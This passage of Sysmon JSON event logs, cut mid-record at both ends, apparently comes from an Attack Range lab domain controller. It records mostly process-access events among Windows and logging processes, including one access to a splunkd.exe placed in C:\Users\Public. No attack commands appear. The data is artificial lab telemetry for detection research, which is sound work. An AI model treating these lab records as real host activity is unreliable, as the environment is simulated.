06:59:58.993","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7151,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:58.993\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:58.993","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7152,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:58.993\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:58.993","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7153,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:58.993\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12EE-5F25-0000-0010AB6E0A00}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:58.993","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12EE-5F25-0000-0010AB6E0A00}","TargetProcessId":"3052","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7154,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.134\r\nSourceProcessGUID: {E2A3D6B1-12EE-5F25-0000-0010AB6E0A00}\r\nSourceProcessId: 3052\r\nSourceThreadId: 4924\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.134","SourceProcessGUID":"{E2A3D6B1-12EE-5F25-0000-0010AB6E0A00}","SourceProcessId":"3052","SourceThreadId":"4924","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7155,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.556\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.556","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7156,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:59.697\r\nProcessGuid: {E2A3D6B1-12EC-5F25-0000-00109E660A00}\r\nProcessId: 4704\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1260-0\\WindowsBase.dll\r\nCreationUtcTime: 2020-08-01 06:59:59.697","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:59.697","ProcessGuid":"{E2A3D6B1-12EC-5F25-0000-00109E660A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1260-0\\WindowsBase.dll","CreationUtcTime":"2020-08-01 06:59:59.697","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7157,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.775\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E4-5F25-0000-0010761E0A00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.775","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E4-5F25-0000-0010761E0A00}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7158,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.775\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E4-5F25-0000-0010761E0A00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:59.775","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E4-5F25-0000-0010761E0A00}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7159,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:59.790\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12EF-5F25-0000-0010FC700A00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 